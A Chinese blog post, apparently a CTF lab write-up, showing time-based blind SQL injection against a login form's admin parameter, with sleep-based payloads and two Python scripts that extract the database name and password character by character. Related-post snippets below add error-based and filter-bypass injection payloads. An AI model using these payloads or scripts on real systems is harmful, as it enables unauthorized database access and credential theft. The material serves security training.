实验吧 看起来有点难 脚本加盲注

最新推荐文章于 2019-07-07 22:56:16 发布
最新推荐文章于 2019-07-07 22:56:16 发布
阅读量163 收藏
点赞数
分类专栏: python sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41306131/article/details/89108538
版权

题目分析

测试?admin=1&pass=1&action=login
在这里插入图片描述报错无法连接数据库
测试?admin=admin'&pass=admin&action=login
在这里插入图片描述说明只要爆密码就可以
用SQL注入的方法

?admin=admin' union select 1,2,3 --+&pass=admin&action=login

在这里插入图片描述弹窗警告
尝试双写大小写绕不过去,而且并没有报错信息
在这里插入图片描述尝试?admin=admin' and sleep(5) --+&pass=admin&action=login
发现延时了
就可以用延时注入
然后先猜当前数据库长度,在用户名后面的参数加?admin=admin' and if(length(database())=4,0,sleep(5)) %23&pass=admin&action=login ,当我们的if判断正确时,页面则不延迟5秒,错误时则会延迟5秒,这里我猜出当前数据库长度为4
在这里插入图片描述 知道数据库长度之后,猜数据库名

先猜数据库的第一位ASCII的码值
先介绍一下substr(str,start,length)函数,str是要截取的字符串,start是开始点,length是截取长度,这里我们的str和length就一直不变,str为database(),表示显示当前数据库名,length始终为1,表示每次都只截取1个字符,所以我们只要变start开始点就行了

?admin=admin' and if(ascii(substr(database(),1,1))>97,0,sleep(10))%23&pass=admin&action=login

,这里我用延迟10秒,因为我网速不是很好

这里当数据库的第一位字符的ASCII码值大于97时不延迟,表示是正确的
最后得到库名为test
因为select 被过滤了 但是发现弹窗也不影响我们的注入
继续猜表名and if(ascii(substr((Select table_name from information_schema.tables where table_schema='test' limit 0,1),1,1))=97,0,sleep(5))%23
在这里插入图片描述得到第一位是 a
然后。

接下来就写脚本!

#coding:utf-8
import requests
import time

j = 1
r = ''
while j<=4:
    for i in range(97,123):
        one=time.time()
        a=requests.get("http://ctf5.shiyanbar.com/basic/inject/index.php?admin=admin' and if(ascii(substr((database()),"+str(j)+",1))="+str(i)+",0,sleep(10))%23&pass=1&action=login")
        two=time.time()
        if two-one<=10:
            r +=chr(i)
            print(r)
            j +=1
            print([END],r)

将database()修改为SeLect table_name from information_schema.tables where table_schema='test'就可以查表

最后在自己学习过程中想到,应该可以直接对password进行注入
给出下面的脚本

#coding:utf-8
import requests
import string

str = string.ascii_lowercase+string.digits+'@_{}.*'
print (str)
flag=""
print ("start:")
# # length 先爆出字段长度
# for i in range(1,20):
#   url = "http://ctf5.shiyanbar.com/basic/inject/index.php?admin=admin' and case when(length(password)=%s) then sleep(8) else sleep(0) end and ''='&pass=&action=login" %i
#   try:
#       res = requests.get(url, timeout=5)
#   except:
#       print (i)
#       break



for i in range(1,9):
    for s in str:
        url = "http://ctf5.shiyanbar.com/basic/inject/index.php?admin=admin' and case when(substr(password,%s,1)='%s') then sleep(8) else sleep(0) end and ''='&pass=&action=login" %(i,s)
        try:
            res = requests.get(url, timeout=5)
        except:
            flag += s
            print ("%s:%s"  %(i,flag))
            break
print ("password:"+flag)

先用上面再用下面

那个人mo得了
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
实验吧简单的sql注入--三题答案一样--_--
Gunther的博客
09-03 5294
简单的sql注入 关键字被过滤了 空格被过滤了 1'/**/unionunion/**/selectselect/**/table_name/**/fromfrom/**/information_schema.tables/**/wherewhere/**//**/'1'='1 这样尝试爆出表名来,居然报错,好吧 我来两个空格(空格被过滤了),估计是有个过滤函数 1'
实验吧——WEB-看起来有点
迷风小白
04-15 2623
看起来有点 用户名:123 密码:123 显示数据库连接失败 用户名:admin 密码:admin 显示登录失败,错误的用户名和密码 结合两次输入回显的内容,我们可以猜测用户名应该是admin,而密码暂时还不知道。 然后测试一下sql注入 admin=admin' union select 1,2,3 --+&pass=admin&action=login 发现被过滤了se...
墨者 - SQL注入漏洞测试(报错盲注)
吃肉唐僧的博客
07-07 2676
根据题意,用updatexml构造报错回显' and updatexml(1,concat(0x7e,(select user()),0x7e),1)--+ 爆库 ' and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+ 爆表' and updatexml(1,concat(0x7e,(select table_n...
实验吧-看起来有点【基于sleep的sql注入脚本
Sp4rkW的博客
08-05 5317
原题内容: 切,你那水平也就这么点了,这都是什么题啊!!! 解题链接:http://ctf5.shiyanbar.com/basic/inject 先吐槽下,,,,这题目开了嘲讽!!! 硬肝了一上午,肝出来就,其实题目挺简单的,写个博客记录下几个个人的失误点,下面为解题思路。 首先login很有意思,admin/admin告诉我用户名密码均错误: 然后试了试1/1,...
时间盲注python脚本.zip
12-28
在本压缩包"时间盲注python脚本.zip"中,包含两个Python脚本文件:time_sql_post.py和time_sql_get.py,分别用于POST和GET方法实现时间盲注自动化攻击。 首先,我们来详细了解一下时间盲注的基本原理。当服务器执行...
布尔盲注python脚本.zip
12-28
在给定的压缩包文件"布尔盲注python脚本.zip"中,有两个文件:bool_sql_post.py和bool_sql_get.py,分别对应于使用POST和GET方法进行布尔盲注的Python脚本。下面我们将详细讨论这两个知识点。 1. **布尔盲注原理**...
CTFSHOW web192 标注盲注脚本
05-04
脚本尝试通过 SQL 注入获取一个网站的 flag,实现过程是构造不同的 SQL 注入 payload 并发送 POST 请求,如果返回的响应中包含特定字符串,则说明获取到了一个字符,将其添到 flag 中,最终输出完整的 flag。...
CTFSHOW web193 left标注盲注脚本
05-04
这段代码是一个用于获取某个网站的 flag 的脚本。它使用了 SQL 注入漏洞来获取 flag。具体来说,它通过构造 SQL 语句的方式,逐个字符地获取 flag。其中,它通过修改注入语句中的 payload 变量,来获取不同的信息,...
sql盲注检测的简单脚本.zip
03-10
时间基盲注是通过判断查询执行时间来确定结果,比如注入一个延时操作,看系统响应时间是否改变。布尔基盲注则依赖于系统的返回状态,例如,通过观察“存在”或“不存在”的提示信息。 3. **检测方法**: - **异常...
SQL盲注中函数的用法
qq_41306131的博客
12-05 2373
sql盲注 函数length() 计算数据库长度 id=1' and lengh(database())=8; 函数left(a,b) sql的left()函数表示的是从字符表达式最左边一个字符开始返回指定数目的字符.若 b 的值大于 a 的长度,则返回字符表达式的全部字符a.如果 b 为负值或 0,则返回空字符串. 一般用来猜测库的名字 库名为security 这说明第一个字符为s 函数su...
sql中GET参数的讲解
qq_41306131的博客
12-03 1872
SQL中接收参数 单引号包括 $sql=&quot;SELECT * FROM users WHERE id='$id' LIMIT 0,1&quot; 上1’ 报错 可以用 1‘ -++ 或者 #(%23) 注释 这里单引号和#只是用来注释 报错的话需要 id=-1 整数型 $sql=&quot;SELECT *FROM users WHERE id=$id LIMIT 0,1&quot;; 上1‘ 报错为 使用’报错会...
SQL注入的基础和原理
qq_41306131的博客
11-28 303
SQL注入原理 一. 介绍sql注入 sql注入是指Web应用程序对用户输入数据的合法性判断,前端输入后端的参数是攻击者可控的,并且带入数据库查询,攻击者可以通过构造不同的SQL语句来实现对数据库的任意操作! 当开发人员在运行过程中需要根据不同的查询标准决定提取什么字段(如select语句),或者根据不同的条件下选择不同的查询表时,动态的构造SQL语句会非常有用。 下面的PHP语句为列子: $qu...
sql中盲注的方法
qq_41306131的博客
12-03 294
sql中盲注的类型 GET_单引号_字符型 先介绍几个函数 rand()函数 随机函数:返回0~1之间的小鼠。 floor()函数 小数向下取整 count()函数 汇总函数:返回匹配指定条件数据 count(*)显示条数 查询返回结果用concat_ws()连接,就可以看到显示值中存在库名 如果concat_ws中不用连接符,返回值恒为0 如果在结尾上表名 显示的就是里面的表的数量 ...
分包合同计量单.docx
07-13
分包合同计量单.docx
树莓派简介PPT课件.ppt
07-13
树莓派简介PPT课件.ppt
项目债务盘点明细表.docx
07-13
项目债务盘点明细表.docx
全网最热Python3入门+进阶 更快上手实际开发
最新发布
07-13
网最热Python3入门+进阶 更快上手实际开发 第1章 Python入门导学.mp4 239.6MB 第9章 高级部分:面向对象 第8章 Python函数 第7章 包、模块、函数与变量作用域 第6章 分支、循环、条件与枚举 第5章 变量与运算符 第4章 Python中表示“组”的概念与定义 第3章 理解什么是写代码与Python的基本类型 第2章 Python环境安装 第1章 Python入门导学 第14章 Pythonic与Python杂记 第13章 实战:原生爬虫 第12章 函数式编程: 匿名函数、高阶函数、装饰器
管理干部培训计划PPT模板
07-13
【作品名称】:管理干部培训计划PPT模板 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
sql注入盲注python脚本
04-06
SQL注入是一种常见的安全漏洞,它允许攻击者通过在应用程序的输入字段中插入恶意的SQL代码来执行未经授权的操作。而盲注是一种特殊类型的SQL注入攻击,攻击者无法直接获取数据库的具体信息,但可以通过不断尝试不同的条件来判断是否存在漏洞。 下面是一个使用Python编写的简单SQL注入盲注脚本的示例: ```python import requests def check_vulnerable(url): payload = "' OR 1=1 --" response = requests.get(url + "?id=" + payload) if "Welcome" in response.text: return True else: return False def exploit_blind(url): result = "" characters = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789" while True: found = False for char in characters: payload = "' OR SUBSTRING((SELECT database()), 1, 1) = '" + char + "' --" response = requests.get(url + "?id=" + payload) if "Welcome" in response.text: result += char found = True break if not found: break return result # 示例使用方法 url = "http://example.com/vulnerable_page" if check_vulnerable(url): database_name = exploit_blind(url) print("数据库名称:", database_name) else: print("目标网站不易受SQL注入攻击") ``` 上述脚本中,`check_vulnerable`函数用于检测目标网站是否易受SQL注入攻击,它通过在URL中插入特定的payload来判断是否存在漏洞。`exploit_blind`函数用于利用盲注漏洞获取数据库名称,它通过不断尝试不同的字符来逐个获取数据库名称的每个字符。 请注意,上述脚本仅为示例,实际使用时需要根据具体情况进行修改和扩展,同时要遵循法律和道德规范,仅在合法授权的范围内使用。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值